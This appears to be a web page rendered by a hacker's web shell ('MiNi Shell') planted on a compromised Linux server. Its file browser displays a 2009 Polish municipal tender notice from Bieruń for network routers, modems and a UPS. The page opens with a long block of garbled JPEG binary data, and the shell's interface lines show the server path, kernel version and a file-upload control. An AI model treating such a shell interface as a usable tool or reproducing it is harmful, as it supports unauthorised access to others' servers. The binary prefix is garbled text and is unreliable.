JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090814/134135-N-2009.html

<p class="kh_header"><b>Bieruń: Dostawa  i konfiguracja routera i urządzeń brzegowych zabezpieczających sieć komputerową w Bieruniu Nowym</b><br>
<b>Numer ogłoszenia: 134135 - 2009; data zamieszczenia: 14.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  i konfiguracja routera i urządzeń brzegowych zabezpieczających sieć komputerową w Bieruniu Nowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i konfiguracja routera i urządzeń brzegowych zabezpieczających sieć komputerową w Bieruniu Nowym, w niżej wskazanych parametrach  i ilościach. 

Router - 1 szt.

DRAM	Min.: 512 MB
Compact Flash	Min.: 128 MB
Fixed USB 1.1 Ports	2
Onboard LAN Ports	2-10/100/1000
Onboard AIM (Internal) Slot	2
Interface Card Slots	4 slots, each slot can support HWIC, WIC, VIC, or VWIC type modules
Interface Card	WIC-2T (2 Port Serial WAN Interface Card)
Network-Module Slot	1 slot, supports NM, NME and NME-X type modules
Extension Voice Module Slot	1
PVDM (DSP) Slots on Motherboard	3
Integrated Hardware-Based Encryption	Yes
VPN Hardware Acceleration (on Motherboard)	DES, 3DES, AES 128, AES 192, and AES 256
Optional Integrated In-Line Power (PoE)	Yes, requires AC-IP power supply
Console Port (up to 115.2 kbps)	1
Auxiliary Port (up to 115.2 kbps)	1
Minimum Cisco IOS Software Release	12.3(8)T
Rack Mounting	Yes, 19- and 23-in. options
Rack Height	2RU
Safety	 UL 60950
 CAN/CSA C22.2 No. 60950
 IEC 60950
 EN 60950-1
 AS/NZS 60950
Immunity	 EN300386
 EN55024/CISPR24
 EN50082-1
 EN61000-6-2
EMC	 FCC Part 15
 ICES-003 Class A
 EN55022 Class A
 CISPR22 Class A
 AS/NZS 3548 Class A
 VCCI Class A
 EN 300386
 EN61000-3-3
 EN61000-3-2
FIPS-2	FIPS 140-2 Certification for 2801, 2811, 2821, 2851


Modem G.shdsl - 6 sztuk

Procesor	min. 50 MHz
Protokoły sieciowe	IP, TCP, UDP, ICMP, TFTP, SNMP, DHCP, BOOTP, RFC-1490, PPP, Frame Relay, CiscoR HDLC, IEEE 802.1q
Sygnalizacja FR	ANSI T1.617 Annex A, ITU Q.933 Annex D, CiscoR LMI
Enkapsulacja na łączu WAN	ATM AAL5
Wydajność	min. 8000 pakietów na sekundę
Przepustowość 	min. 128 - 9728 kb/s na 2 parach
Interfejs Ethernet	10/100Base-T, złącze RJ45
Konsola szeregowa	RS-232, złącze DB9/M
Funkcje	  router TCP/IP
  NAT/maskarada
  firewall
  wbudowany wyświetlacz LCD i klawiaturka ułatwiające konfigurację
  zarządzanie przez telnet
  zarządzanie przez SNMP
  zarządzanie przez konsolę szeregową
  serwer DHCP/BOOTP (dynamiczny przydział adresów IP i innych parametrów komputerom w sieci)
  DHCP/BOOTP Relay Agent (przekazywanie zapytań DHCP/BOOTP do centralnego serwera)
  upgrade oprogramowania przez TFTP
  możliwość pracy jako zarządzalny lub niezarządzalny bridge 
  zapisywanie przebiegu pracy routera przez syslog 
  obsługa VLANów 
  zabezpieczenia przed nieautoryzowanym korzystaniem z sieci LAN 
  pomiar temperatury wewnątrz modemu
  Automatyczne rozdzielanie przesyłanych danych na dwa łącza 
  Możliwość ustawienia różnych przepustowości na każdym z łącz (w przypadku linii różnej jakości) 
  Automatyczne przełączanie na pracę jednoparową w przypadku awarii jednej z linii

UPS - 1 szt.

Rodzaj	Wolnostojący
Moc skuteczna	Min. 90W
Moc pozorna	Min. 1500VA
Napięcie wejściowe	Min. 220V
Napięcie wyjściowe	Min. 220V
Kształt przebiegu sinus	Sinusoida przybliżona
Topologia	Line interactive
Typ akumulatora	Bezobsługowe baterie ołowiowo-kwasowe
Czas podtrzymania przy 50% obciążenia	min 23 min
Czas podtrzymania przy 100% obciążenia	min. 6 min.
Interfejs	DB-9 RS-232, gniazdo typu SmartSlot, USB

W związku z koniecznością dostosowania się Zamawiającego do istniejących systemów sieciowych firmy CISCO, Zamawiający wymaga dostarczenia sprzętu zgodnego z wyżej wymienionymi parametrami. 
Wszędzie w miejscach, gdzie Zamawiający powołuje się na znaki towarowe Zamawiający dopuszcza rozwiązania równoważne, nie obniżające jednak możliwości użytkowych Zamawiającego.
Na podstawie art. 30 ust. 5 ustawy, Wykonawca  który powołuje się na rozwiązania równoważne jest obowiązany wykazać w ofercie, że oferowane przez niego dostawy spełnią wymagania Zamawiającego. 


Dostarczony sprzęt ma być fabrycznie nowy, wyprodukowany w 2009 roku.
Zamawiający nie przewiduje zawarcia umowy ramowej, aukcji elektronicznej, udzielenia zamówień uzupełniających  w rozumieniu ustawy Pzp ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 32.55.24.10-4, 30.23.71.10-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Zasady wnoszenia wadium

Wadium w wysokości 1 000,00 zł ( słownie: jeden tysiąc  złotych 00-100 ) musi być 
wniesione w terminie, który został podany w punkcie  Terminy. 
Wadium wnoszone w pieniądzu  należy przelać na rachunek Zamawiającego 
w BS O-Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją: 
Wadium - nr sprawy: ZP- 3410 - 35  -09 -Dostawa i konfiguracja routera i urządzeń brzegowych zabezpieczających sieć komputerową w Bieruniu Nowym.
Wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium na rachunku Zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 12:00  w dniu otwarcia ofert. 
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)    w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy 
       z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 
       poz.1158 z późniejszymi zmianami).
W przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się o udzielenie nin. zamówienia, w dokumentach wadialnych należy wskazać  wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib. Brak powyższego wskazania będzie skutkował wykluczeniem Wykonawcy.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                    z art. 24ust.2 pkt 4 ustawy, a jego oferta zostanie odrzucona.

2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy wraz                  z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1) Zgodnie z art. 46 ust.1 ustawy, wadium zostanie zwrócone niezwłocznie, jeżeli:
a) upłynął termin związania ofertą,
b) zawarto umowę i wniesiono zabezpieczenie należytego wykonania tej umowy,
c) Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte 
lub upłynął termin do ich wnoszenia.
2) Z zastrzeżeniem ust.4a ustawy, Zamawiający zwraca niezwłocznie wadium na wniosek 
    Wykonawcy:
     a) który wycofał ofertę przed upływem terminu składania ofert;
     b) który został wykluczony  z postępowania;
     c) którego oferta została odrzucona.


3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to                 z przyczyn nie leżących po jego stronie.
Zgodnie z art. 46 ust. 5 ustawy Zmawiający zatrzymuje wadium wraz z odsetkami, jeżeli  Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych     w ofercie;
2) nie wniósł zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
1)	spełniają wszystkie wymagania wynikające z  oświadczeń, których listę przedstawiono                 w punkcie Wymagane oświadczenia oraz inne wymagania formalne określone  SIWZ                       i ustawą;
      2)   w okresie ostatnich trzech lat przed dniem wszczęcia  postępowania, a jeśli okres prowadzenia 
działalności jest krótszy - to w tym okresie, wykonali z należytą starannością co najmniej jedną dostawę sprzętu komputerowego o wartości brutto minimum 50 000,00 PLN ;
      3) posiadają ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności na 
           kwotę min. 50 000,00PLN; 
      4)  posiadają środki finansowe w wysokości co najmniej 50 000,00 PLN lub posiadają 
            zdolność kredytową w wysokości co najmniej 50 000,00 PLN;
      5) zapewnią gwarancję na oferowany sprzęt min.  24 m-ce  od daty  podpisania protokołu odbioru

Ocena spełnienia warunków uczestnictwa w postępowaniu będzie dokonana wg zasady:     spełnia - nie spełnia, na podstawie przedłożonych w ofercie dokumentów i oświadczeń w związku z wymaganiami określonymi w SIWZ i ustawie.     
 W przypadku wspólnego ubiegania się dwóch lub więcej  Wykonawców o udzielenie niniejszego   
  zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu   
  dokumenty może złożyć ten lub ci Wykonawców, którzy w imieniu wszystkich wykazywać będą  
  spełnianie  warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia :
1.	Oświadczenie  z  art. 22  ust. 1 ustawy, że :
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada niezbędną wiedzę i doświadczenie oraz  dysponuje potencjałem technicznym              i osobami zdolnymi do wykonania zamówienia lub przedstawi  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 ustawy.
       2.    Oświadczenie, że po zapoznaniu się z  SIWZ - akceptuje je bez zastrzeżeń.
3.	Oświadczenie, że będzie związany przedmiotową ofertą przez okres 30 dni od daty upływu   terminu składania ofert, a w przypadku wygrania przetargu zawrze umowę wg wzoru  dołączonego do SIWZ w ciągu 14 dni od daty otrzymania informacji o wyborze oferty.
4.    Oferta jest jawna w całości - części. Strony oferty od -   do     stanowią tajemnicę   
       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą 
       być ujawnione innym uczestnikom postępowania.
      5.     Oświadczenie podmiotów występujących wspólnie (konsorcjum, spółka cywilna) - w 
              przypadku ich  udziału w postępowaniu. 
      6.   Oświadczenie o wykonaniu zamówienia własnymi siłami lub określeniu jaka część 
             zamówienia  zostanie powierzona podwykonawcom.
      7.    Oświadczenie o udzielonej gwarancji.
      8.    Oświadczenie, że oferowany sprzęt jest fabrycznie nowy, wyprodukowany w 2009 r. 
            9.    Oświadczenie, że oferowany sprzęt będzie kompatybilny ze wskazaną w opisie przedmiotu zamówienia infrastrukturą Zamawiającego. 

Wzory oświadczeń  dołączone są do SIWZ. 

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnioną (uprawnione) do zaciągania zobowiązań w imieniu wykonawcy, zgodnie                     z załączonym do oferty aktualnym wpisem do właściwych rejestrów (KRS) czy ewidencji działalności gospodarczej,   lub odpowiednimi pełnomocnictwami. Pełnomocnictwa muszą być załączone do oferty w formie oryginałów lub notarialnie poświadczonych kopii.

Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów  z dnia 19 maja 2006 roku  (Dz. U. Nr  87-2006 poz. 605 z późniejszymi zmianami) mogą być przedstawione w formie oryginału albo kserokopii poświadczonych za zgodność z oryginałem (zaleca się poświadczenie każdej zapisanej strony dokumentu) przez wykonawcę tzn. osobę (osoby) uprawnioną(e) do podpisania oferty:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
      2.   Wykaz wykonanych  z należytą starannością dostaw sprzętu komputerowego w okresie trzech 
             lat  przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy 
             - to  w tym okresie.    
           Należy wykazać co najmniej 1 dostawę zgodną z warunkami podanymi w pkt. VI. 2. 
	     Wykaz należy sporządzić wg wzoru tabeli stanowiącej załącznik do SIWZ.
      3.   Dokumenty ( np. referencje zamawiających) potwierdzające należytą staranność wykonania co 
            najmniej 1 dostawy sprzętu  z  podanych w wykazie dostaw, dla dopełnienia wymaganego 
             w pkt. VI.2 warunku.  
4.  Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym 
    Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych 
     lub zdolność kredytową Wykonawcy min. 50 000,00 PLN, wystawioną nie wcześniej niż 3 
           miesiące przed upływem terminu składania ofert .
      5. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest 
          ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę 
          min. 50 000,00 PLN

Uwaga:
Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt. 1,  Listy wymaganych dokumentów  przedstawia odpowiednio:
1)  pkt 1  - dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono 
     upadłości,
Dokument, o których mowa powyżej,  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa 
w punkcie 1 niniejszej uwagi.
Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, 43-150 Bieruń , Rynek 14 (Referat Zamówień Publicznych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2009 godzina 12:00, miejsce: Urząd Miejski, 43-150 Bieruń , Rynek 14 (Kancelaria - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com